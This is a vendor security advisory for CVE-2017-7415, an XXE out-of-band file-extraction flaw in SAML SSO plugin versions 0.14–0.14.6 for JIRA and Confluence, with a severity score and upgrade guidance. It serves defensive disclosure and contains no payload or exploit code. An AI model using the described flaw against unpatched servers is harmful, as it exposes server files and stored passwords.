SAML Single Sign On Security Advisories Current: 2017-05-23-01 XXE Out Of Band Extraction Vulnerability 2017-05-23-01 XXE Out Of Band Extraction Vulnerability SummaryCVE-2017-7415 - XXE Out Of Band Extraction VulnerabilityAdvisory Release Date23 May 2017 ProductSAML Single Sign On (SSO) for JIRASAML Single Sign On (SSO) for ConfluenceAffected SAML SSO versions0.14 - 0.14.6 (including)Fixed SAML SSO versionsVersions of SAML SSO equal to and above 0.14.7 contain a fix for this issue.The SAML Single Sign On (SSO) for Bitbucket Plugin is not affected.CVE ID(s)TBASummary of VulnerabilityThis advisory discloses a medium severity security vulnerability affecting SAML Single Sign On Plugin Version 0.14 - 0.14.6 for JIRA and Confluence. Please upgrade your Installations immediately to fix this vulnerability.Versions before 0.14 are not affected.Authenticated users can extract file system content from JIRA/Confluence Server via XXE Out of Band.Severityresolution rates the severity level of this vulnerability as medium, according to the CVS Specification Full CVS Scoring:Serevity: MediumTemporal Score: 6.0CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:F/RL:O/RC:CThis is an independent assessment and you should evaluate its applicability to your own IT environment.DescriptionA REST API endpoint in the Confluence and JIRA plugins uses an unsafe DocumentBuilder parser to parse XML responses allowing for XXE attacks. The end result is that any authenticated user can read arbitrary files from the JIRA or Confluences servers filesystem including configuration, passwords, etc.AcknowledgementsThis Vulnerability has been disclosed to us via a third-party organisation as a responsible disclosure on 22.05.2017 23:55 CET. Further Credits TBDFixWe have taken the following steps to address this issue:Released SAML Plugin Version 0.14.7 that contains a fix for this issue.What You Need to DoUpgrade to SAML Plugin Version 0.14.7 or higher.SupportIf you have questions or concerns regarding this advisory, please raise a support request via our Support Portal. SAML Single Sign-On is available for Atlassian Server & Atlassian Data Center products. Our Jira Data Center, Confluence Data Center, Bitbucket Data Center, Jira Server, Confluence Server, Bitbucket Server and other apps are all available on the Atlassian Marketplace.